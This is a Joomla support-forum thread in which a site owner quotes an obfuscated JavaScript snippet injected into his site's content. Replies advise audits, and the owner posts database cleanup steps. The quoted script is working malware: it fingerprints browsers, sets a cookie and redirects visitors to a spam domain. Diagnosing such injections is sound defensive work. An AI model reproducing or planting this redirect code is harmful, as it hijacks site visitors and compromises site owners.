Joomal website contains a redirect to spam website

[rv789]

Hi,

my website suddenly contains redirect to a spam website. Visible in this source code:

Code: Select all

a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https://www.areyourobots.xyz','getElementById','wpadminbar','undefined','setTime','getTime',';\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\x20path=/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](/Android/i)||navigator['userAgent'][b('0xe')](/BlackBerry/i)||navigator[b('0xd')][b('0xe')](/iPhone|iPad|iPod/i)||navigator[b('0xd')][b('0xe')](/Opera Mini/i)||navigator[b('0xd')][b('0xe')](/IEMobile/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));

Now while looking/searching through all the code + database there is nowhere to be found where this code is actually injected in the output html. Also did a file timestamp check but no apparent files with a unusual timestamp.

I can replace the joomla code, database, whatever but until i understand where this injection comes from this would be vutile.

What would be the next step for me to take to analyse this issue?
What could be causing this code injection?
Any hints? Surely i would not be the first to have an issue with this.

Joomla code was recent (3.9.18) upgraded to 3.9.22. today. This did not resolve the issue. Nothing unusual in FPA.

[gsmela]

The experts will tell you to post the FPA since that is what it is for and is as good a place to start as any.

Your site has probably been hacked. I'd go to mysites.guru and run an audit. The first one is free and will tell you what's wrong.

[JAVesey]

The experts will tell you to post the FPA since that is what it is for and is as good a place to start as any.

Your site has probably been hacked. I'd go to mysites.guru and run an audit. The first one is free and will tell you what's wrong.

All good advice.

My guess would be an old/outdated/insecure extension or misconfigured permissions rather than Joomla core vulnerability.

FPA and mysites.guru 1st choice every time

[rv789]

Well, i did check mysites + fpa but nothing that would hints as to where this html code is actually injected. First I need to find this before I can take any further measures.

I am pretty sure someone here would have seen this issue before and could give me a proper hint.

[gsmela]

If you're going to ignore the suggestion to post the FPA so the experts can review it, why keep coming back?

[PhilTaylor-Prazgod]

Well, i did check mysites ... but nothing that would hints as to where this html code is actually injected

Im sorry to hear that. You did not ask for support for the mySites.guru product or ask me why it never found anything... mySites.guru certainly does find this exact code snippet and would display it under normal audit conditions, in its suspect content tool.

In fact as the only person registering at mySites.guru today used a fake disposable address, this account has now been blocked too. mySites.guru is not a disposable service, it is a subscription service with a free trial.

[PhilTaylor-Prazgod]

I'll give you this free hint.

The script has been appended to all your content items in the database. You will need to manually delete this from every content item in the database.

[rv789]

Hi Phil Taylor,

that is a very useful advice. But why am i not seeing the code in myPhpAdmin?

[rv789]

For anybody interested in a simple path to a solution here is the steps i took (bypassing any replies from regular visitors here that do not make you feel too warm and welcome on this forum):

1.Go to your phpMyAdmin (note the offende code is not visible here!)
2. export your table j35_content
3. open de exported file in a *good* texteditor like notepad++
4. search for a part of the offending js-code. You should see it in every record
5. now search-and-replace the offending code. Make sure to search for the full js code starting with <script> and ending wit </script>, and take care not to include any surrounding characters. Replace all occurences with an empty string.
6. Save the file
7. in phpMyAdmin, rename the j35_content table to say j35_content_hacked
8. in phpMyAdmin, import the edited file from step 6. Check that your j35_content table is there and has content.
9. clean the joomla cache, if needed delete any file from /cache/com_content via filezilla.

After this, update or remove any outdated extension in your joomla, they could have been the vulnerability that your hacker used to poisen your database.

All this make me wonder: why is Joomla allowing script-code from a content table to leak to the html? I can see no reason why not block this via some blacklist-regex.

[rv789]

Hi,

would it be possible to block any javascript-code from the j35_content table to leak through to the resulting html?

I see no good reason for js-code to be allowed in the content and it is a great change for hackers to put harm on your website. And it is as simple as a blacklist-regex.

Any core functionality or extension that blacklist script content?

[Rondeb]

Good to read that it has been resolved.

Another tip change all your passwords from database to joomla login otherwise they might be within the hackers again

Greatings Ron